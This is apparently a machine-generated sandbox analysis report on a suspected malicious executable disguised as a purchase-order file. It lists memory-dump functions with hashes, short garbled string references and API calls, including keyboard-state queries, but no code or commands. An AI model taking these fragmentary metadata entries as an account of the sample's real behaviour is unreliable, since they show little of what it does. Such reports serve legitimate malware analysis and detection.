Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
Instruction ID: 6377789f0b8a7a8539b315b6ed8041a93d305d96d2a23cfc59ebb893dba4b59b
Opcode Fuzzy Hash: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
Instruction Fuzzy Hash: D0218E755093808FCB02CF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62

Function 00EFD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776625651.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_efd000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: f5090ce0ba40ceb4b278c6bb86c076162e21d490d98836dee983ef3f83a7c50c
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6F110372404284CFCB02CF10D9C4B26BF72FB94328F24C6A9D9090B256C336D85ACBA2

Function 00F0D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776657271.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0d000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 2ada62e0e48008d1d4d8401518d589db13f2cfba2749ecea2603c64e5992a34a
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 9611BB75904280DFCB16CF54C9C4B15FBA1FB84324F24C6AAD8494B696C33AD80AEB61

Non-executed Functions

Function 0B883230 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 0B88327D
GetKeyState.USER32(00000002), ref: 0B8832C2
GetKeyState.USER32(00000004), ref: 0B883307
GetKeyState.USER32(00000005), ref: 0B88334C
GetKeyState.USER32(00000006), ref: 0B883391

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: d85534699fd8e3450e5c8a1a780147de6f381a4c5e2703ea37f7fac5a0ad38c5
Instruction ID: 78603f424591d6c4374f31b8bfc7b190a455201e048e823ba0a80e634522231c
Opcode Fuzzy Hash: d85534699fd8e3450e5c8a1a780147de6f381a4c5e2703ea37f7fac5a0ad38c5
Instruction Fuzzy Hash: 81416A71D017468FDB11EF99D5083AFBFF4AB08709F208459E189BB290CBB99145CFA6

Function 0C46EF30 Relevance: 1.8, Strings: 1, Instructions: 564COMMON

Download Yara Rule

Strings

fff?, xrefs: 0C46F59F

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: 5dddd4b007c257e9bd9ec140bc92f7e84a67ee4d3ac8029384f9922e5b88fb30
Instruction ID: 6a6d86db64ba7f8787bbd3171ae8cb59cdcf0653d4168e00254e5c6201ad794a
Opcode Fuzzy Hash: 5dddd4b007c257e9bd9ec140bc92f7e84a67ee4d3ac8029384f9922e5b88fb30
Instruction Fuzzy Hash: BE425B3690061ADFCF11DF90C884AD9B7B2FF99300F1586D5E9086B265E771AAD9CF80

Function 0C46F16D Relevance: 1.7, Strings: 1, Instructions: 456COMMON

Download Yara Rule

Strings

fff?, xrefs: 0C46F59F

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: d91d3b66dd0e3e5455a4fe9110b976fc5a095a213fd78ab45786ab6d3bcfc011
Instruction ID: 9e857a72251acc5a20f29c433eef0090f7956b7bec937eac3c11a50c613b7741
Opcode Fuzzy Hash: d91d3b66dd0e3e5455a4fe9110b976fc5a095a213fd78ab45786ab6d3bcfc011
Instruction Fuzzy Hash: 8422383690061ADFDF11DF50C888BD9B7B2FF49300F0585D5E9096B16AD771AA9ACF80

Function 02B60040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76fb3b8cac70008146dad764b8dfbfc8b808d2f244a071a50930847b12544891
Instruction ID: ef2c7ab4257363e3a800acdac7d876b41c0df059a74759b02755501b3d9b8a8b
Opcode Fuzzy Hash: 76fb3b8cac70008146dad764b8dfbfc8b808d2f244a071a50930847b12544891
Instruction Fuzzy Hash: C212B4B0C117468AE7BACF25E94C18D3BB6BB44328B50432AD2751A2E9DBF415CBDF44

Function 0710A760 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb5bcdf3334c7247750ec2bea2200b26bc88ef07829fecc0191c6e2cc6ae46f
Instruction ID: 9e7f83aaaa585725e06c877ec0862950ce6b74af4a5a12f270a8ac4bfc20f0fd
Opcode Fuzzy Hash: 3eb5bcdf3334c7247750ec2bea2200b26bc88ef07829fecc0191c6e2cc6ae46f
Instruction Fuzzy Hash: 91E1E9B4E102198FCB14DF99C5809AEBBF2BF89305F24C159D415AB396DB71AD42CFA0

Function 0710C440 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fc99112dd32d085952a84427620151d6083af75dc69dd54a0dcb20ffe2a961
Instruction ID: 074e13a55ac0c4a5f05b8c023d8fa0c957a6cd2b11266bdda64d8ef1f79ef5d3
Opcode Fuzzy Hash: f5fc99112dd32d085952a84427620151d6083af75dc69dd54a0dcb20ffe2a961
Instruction Fuzzy Hash: 6CE1FCB4E101198FCB14DF99C5809AEFBF2BF89305F248259E415A7396DB70AD42CFA0

Function 0710A328 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0276570e1e32de0d5533b1a9b3d1018b4651ef68ae4b80e10c606c41bd156b
Instruction ID: b3c7cc1b4dec3df2b68742a7f60e41216fcc737513ee09ce45b707aa14cc63ca
Opcode Fuzzy Hash: 9d0276570e1e32de0d5533b1a9b3d1018b4651ef68ae4b80e10c606c41bd156b
Instruction Fuzzy Hash: 40E1EBB4E102198FCB14DFA9C5909ADBBF2BF89305F24C159D414AB395DB71A942CFA0

Function 07109EF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5bfee151f324e8f4833b0ee98e7255a0a2fb31cd57cb9d84c925ebbab97a3b3
Instruction ID: 43521783c51a2923da9e675f8cd4f56ad1607ddf5a305931940e8784c2fce41d
Opcode Fuzzy Hash: e5bfee151f324e8f4833b0ee98e7255a0a2fb31cd57cb9d84c925ebbab97a3b3
Instruction Fuzzy Hash: 90E1ECB4E102198FCB14DFA9C5909AEBBF2BF89305F24C169D414A7356DB71AD41CFA0

Function 0710AB98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024498cfa72a059c0ae60245a831e994b642e823f1372e9423827cf6cc0f1152
Instruction ID: 82c1eaaf1681ed8507021bbe5a2d2d5ae7a772cd9ddf54c3dfda2ea19aac00ce
Opcode Fuzzy Hash: 024498cfa72a059c0ae60245a831e994b642e823f1372e9423827cf6cc0f1152
Instruction Fuzzy Hash: 62E1D9B4E102198FCB14DFA9C5909AEBBF2BF89305F24C159E414A7395DB71AD42CFA0

Function 00F9DD14 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3ca09374d1c00857c293adb750f9b625bc7656fec7fa32062ba763e66acafc
Instruction ID: 8bac38221ab2983daab055d5bad43a63b1aaf9cc56767eb2752b9637f7ae09d2
Opcode Fuzzy Hash: 3f3ca09374d1c00857c293adb750f9b625bc7656fec7fa32062ba763e66acafc
Instruction Fuzzy Hash: ACA1AF32E002098FDF19DFB5C8409EEB7B2FF84310B25857AE905AB265DB75E945DB80

Function 02B60006 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1985bf243b03412c54602e1be579a1c71eecb8276530ee31479e4d74cbd19682
Instruction ID: 8d3b146747e97561428d259e531e569fb66517b8309d2b844e3adbe834f66aee
Opcode Fuzzy Hash: 1985bf243b03412c54602e1be579a1c71eecb8276530ee31479e4d74cbd19682
Instruction Fuzzy Hash: 01D118B0C007468BD7AACF25E94818D7BB6BB85318B51432AD1716B2E9DBF814CBCF44

Function 07023798 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d04f114ec58b5dfd598f16205b5130c2e3d6afc53f0fc1d5dfbd4eb64927e41
Instruction ID: b0091533c74037af9b2ebc79db2ec16227f763af5aea5de136b42119111d3e62
Opcode Fuzzy Hash: 3d04f114ec58b5dfd598f16205b5130c2e3d6afc53f0fc1d5dfbd4eb64927e41
Instruction Fuzzy Hash: 7351BE33440A1C8FD704EB2BE9476C577A4EF66214F369389C678AB2F1D6A8A042CE44

Function 07108FB0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41cd5536282c9b1932303e51c1fab7ef166d63c6b60893e37992ab1e134e791
Instruction ID: c3e4a5675d28e630b88332cfd8ede1b93f7b44f862ef9b307e42699d3e59f4c4
Opcode Fuzzy Hash: a41cd5536282c9b1932303e51c1fab7ef166d63c6b60893e37992ab1e134e791
Instruction Fuzzy Hash: 7E51F6B4E18209CFCF08CF99D4545EEFBFABF8A310F159025E419A7296D7B1A941CB90

Analysis Process: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exePID: 7340, Parent PID: 2896COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	2

Executed Functions

Function 0273C147 Relevance: 6.5, Strings: 5, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0os, xrefs: 0273C20A
PH^q, xrefs: 0273C400
Ljs, xrefs: 0273C38D
PH^q, xrefs: 0273C3EF
Ljs, xrefs: 0273C377

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 08aecd0a2a8de83cb7d655cc0addd2b76d90b916cdfb951c0066c925fce0a5a2
Instruction ID: afaf1fed29ea651198f65aa714d76cdaaf962682b17d12fb103492b239761176
Opcode Fuzzy Hash: 08aecd0a2a8de83cb7d655cc0addd2b76d90b916cdfb951c0066c925fce0a5a2
Instruction Fuzzy Hash: 23A1F874E00218CFDB16DFA9D884A9DBBF2BF89310F14806AE409EB366DB319841CF51

Function 0273C468 Relevance: 6.5, Strings: 5, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljs, xrefs: 0273C65D
0os, xrefs: 0273C4DA
Ljs, xrefs: 0273C647
PH^q, xrefs: 0273C6D0
PH^q, xrefs: 0273C6BF

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: adbb27d2db059fc2f8efd96f72b58004158b3f0720eb1562d15c3f5f80768b25
Instruction ID: 4b27ddfb975b132358a6027570fe05315041259e412c91d6bce4cb74cb601038
Opcode Fuzzy Hash: adbb27d2db059fc2f8efd96f72b58004158b3f0720eb1562d15c3f5f80768b25
Instruction Fuzzy Hash: 2E91D574E00218CFDB15DFAAD884A9DBBF2FF88300F14906AE419AB366DB709941CF50

Function 02735362 Relevance: 6.4, Strings: 5, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljs, xrefs: 02735550
PH^q, xrefs: 027355D9
Ljs, xrefs: 02735566
PH^q, xrefs: 027355C8
0os, xrefs: 027353E2

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 967bb517de733ac73047ff2529232c72b4c9a2e7730737c3e2523fbd0dafecf3
Instruction ID: c5f23beac8a5a2964e05090a9a7fe2a57d2f0aa5bfae785edc9d587f1e8fa1a0
Opcode Fuzzy Hash: 967bb517de733ac73047ff2529232c72b4c9a2e7730737c3e2523fbd0dafecf3
Instruction Fuzzy Hash: C991F374E01258CFDB19CFA9D884A9DBBF2BF89300F54C069E409AB366DB71A945CF50

Function 0273CA08 Relevance: 6.4, Strings: 5, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljs, xrefs: 0273CBE7
PH^q, xrefs: 0273CC5F
PH^q, xrefs: 0273CC70
Ljs, xrefs: 0273CBFD
0os, xrefs: 0273CA7A

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 146ae3ca7497fcfd6851bbb22a0e11a38ff47ebbf29f9dbc18ee3a48d72a503d
Instruction ID: 057d345b672a372b253919d5b0d1340f6f4f43f5d69b3a32094ce9dae3915ca1
Opcode Fuzzy Hash: 146ae3ca7497fcfd6851bbb22a0e11a38ff47ebbf29f9dbc18ee3a48d72a503d
Instruction Fuzzy Hash: A681C374E01258CFEB15DFAAD984A9DBBF2BF88300F14806AE419BB365DB709941CF54

Function 0273D278 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0273D4E0
0os, xrefs: 0273D2EA
PH^q, xrefs: 0273D4CF
Ljs, xrefs: 0273D457
Ljs, xrefs: 0273D46D

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 38ad4a38ad6c53922ef169ddeb08b2fa5a4453a4ef05447e5bd829fe73389e79
Instruction ID: 3ae43b2f7f9f79fb315dde223dbd21fb0ce626e88d53a11e9574150d8297d7f0
Opcode Fuzzy Hash: 38ad4a38ad6c53922ef169ddeb08b2fa5a4453a4ef05447e5bd829fe73389e79
Instruction Fuzzy Hash: 8C81B874E01218CFDB29DFAAD954A9DBBF2BF48310F14C069E419AB365DB709941CF50

Function 0273CCD8 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0273CF2F
Ljs, xrefs: 0273CEB7
0os, xrefs: 0273CD4A
PH^q, xrefs: 0273CF40
Ljs, xrefs: 0273CECD

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 317fd2dc2c2489c3416381b04e96faf1562fd74ecd9725d203a67d287ac5de58
Instruction ID: dd55030ec2c23224e4f453200f7509a35aeccf473f8e160caca36462f9dfd297
Opcode Fuzzy Hash: 317fd2dc2c2489c3416381b04e96faf1562fd74ecd9725d203a67d287ac5de58
Instruction Fuzzy Hash: A881B474E01218DFDB15DFAAD984A9DBBF2BF89300F14806AE409BB365DB705941CF50

Function 0273C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0os, xrefs: 0273C7AA
PH^q, xrefs: 0273C9A0
Ljs, xrefs: 0273C917
PH^q, xrefs: 0273C98F
Ljs, xrefs: 0273C92D

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: f1264911ba129cc074198e990697301b29b51eccc09ae098295f7bae11571527
Instruction ID: 354b7839ee1d33134c8318997c074d33eab9a850965a8684c56fecf2ab841d99
Opcode Fuzzy Hash: f1264911ba129cc074198e990697301b29b51eccc09ae098295f7bae11571527
Instruction Fuzzy Hash: DA81A074E00218DFDB15DFAAD984A9DBBF2BF88300F15C06AE419AB365DB709941CF50

Function 0273CFAB Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ljs, xrefs: 0273D19D
PH^q, xrefs: 0273D210
PH^q, xrefs: 0273D1FF
Ljs, xrefs: 0273D187
0os, xrefs: 0273D01A

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 0os$Ljs$Ljs$PH^q$PH^q
API String ID: 0-1454975990
Opcode ID: 7525a0f8cc4ca152a1eb009ad8b934acc412dbedbec7585886c83b5f23b95536
Instruction ID: 2459b3a3b99168abb61d27749ae5ad8da6292741bbaf1fc88f84321631cdc38b
Opcode Fuzzy Hash: 7525a0f8cc4ca152a1eb009ad8b934acc412dbedbec7585886c83b5f23b95536
Instruction Fuzzy Hash: 9A81C374E01218CFDB15DFAAD994A9DBBF2BF88300F15D069E409AB365DB709981CF50

Function 02736FC8 Relevance: 5.5, Strings: 4, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 0273728A
(o^q, xrefs: 02737220
,bq, xrefs: 02737298
(o^q, xrefs: 02737212

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: f4ffc2d73eb8d37de0f8e53577333d8fc01f2df03a8f8330ce1c123d8d3c3c01
Instruction ID: 4b5286b1298d6432c5f36af36a5e73794153f21dc89e164d667a86f20d1ca539
Opcode Fuzzy Hash: f4ffc2d73eb8d37de0f8e53577333d8fc01f2df03a8f8330ce1c123d8d3c3c01
Instruction Fuzzy Hash: 67125FB1A00219DFCB1ACF68C884AADFBF2FF49314F158469E845AB262D731ED41CB51

Function 0273A088 Relevance: 3.4, Strings: 2, Instructions: 905COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0273AB13
(o^q, xrefs: 0273A518

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 2c5235fc382b76ba389942d058c9e0a12cdf73097d44e32e7733a66280affcd4
Instruction ID: 57a65d0bd9050566c19cc16e2387ffbfe7c79808a025e5fcafc1d11a2abd3ff9
Opcode Fuzzy Hash: 2c5235fc382b76ba389942d058c9e0a12cdf73097d44e32e7733a66280affcd4
Instruction Fuzzy Hash: FA82AF31A00209DFCB16CFA8C585AAEBBF2FF88314F158559E485AB366D731ED41CB54

Function 027369A0 Relevance: 3.0, Strings: 2, Instructions: 521COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02736EDA
Hbq, xrefs: 02736DA6

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: be048aab96d82b55152d4e215256f57164bbf38bc136f8c891265bfef4745812
Instruction ID: acb53afe517561d700f8047336d266bb6465e4b232ac8b78dba86043a5f19761
Opcode Fuzzy Hash: be048aab96d82b55152d4e215256f57164bbf38bc136f8c891265bfef4745812
Instruction Fuzzy Hash: CA129D70A002199FDB19DF69C854BAEBBFAFF88304F148569E405EB396DB309D41CB94

Function 05357B78 Relevance: 1.8, APIs: 1, Instructions: 296COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05357D68

Memory Dump Source

Source File: 00000004.00000002.4176791008.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5350000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3a2c84f24da5e7614b4f1dd29232e9e8a68c23a41cac4f78c09d055ad3ccaff1
Instruction ID: d1db01296f47636a078421a64f04d258981571685d76f1b5534eddf57d5a22ca
Opcode Fuzzy Hash: 3a2c84f24da5e7614b4f1dd29232e9e8a68c23a41cac4f78c09d055ad3ccaff1
Instruction Fuzzy Hash: 00E1B174E01218CFEB24DFA5C944B9DBBB2BF89304F2081A9D809BB395DB755A85CF10

Function 0273E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0abff6740b5079b43c82f10f0a2d3fe3b74a37ff91834cf2d08d74d7d768c0
Instruction ID: 8a31577a5242967c2ef700af9df4b76f2a29b2c6ba733c9ed5874546011f4e15
Opcode Fuzzy Hash: cb0abff6740b5079b43c82f10f0a2d3fe3b74a37ff91834cf2d08d74d7d768c0
Instruction Fuzzy Hash: FF51A374E00308DFDB19DFAAD584A9DBBB2BF88300F208429E815AB365DB319945CF54

Function 0273E97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c704c773b46b895e312ee74ebe85ea8c3397437f4a0d3e1502d4d16faf46431
Instruction ID: 09d19428c330fa383d8288779925b930b5feeb71e1da917e1be7c3f7f129cf12
Opcode Fuzzy Hash: 3c704c773b46b895e312ee74ebe85ea8c3397437f4a0d3e1502d4d16faf46431
Instruction Fuzzy Hash: 6B51B474E00208DFDB19DFAAD994A9DBBB2FF88300F248429E815BB365DB319845CF54

Function 027376F1 Relevance: 10.5, Strings: 8, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 0273772E
(o^q, xrefs: 027378B2
,bq, xrefs: 02737B90
(o^q, xrefs: 02737BFF
(o^q, xrefs: 02737815
(o^q, xrefs: 027377E9
(o^q, xrefs: 02737C0F
,bq, xrefs: 02737BA0

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 2b0b7016b6bf3882cf0c476c5042a3d0f2daecd824c09fcd8f2682739098fc4b
Instruction ID: 888e1674206d6b06651aef3fd8ed87824b5e45d98ea083ff1ad6f8e5ad54d18a
Opcode Fuzzy Hash: 2b0b7016b6bf3882cf0c476c5042a3d0f2daecd824c09fcd8f2682739098fc4b
Instruction Fuzzy Hash: 62125970A002488FCB1ACF69D984AAEFBF2FF49314F1485A9E4199B362D731ED41CB50

Function 02735F38 Relevance: 2.8, Strings: 2, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 02736056
Hbq, xrefs: 02736023

Memory Dump Source

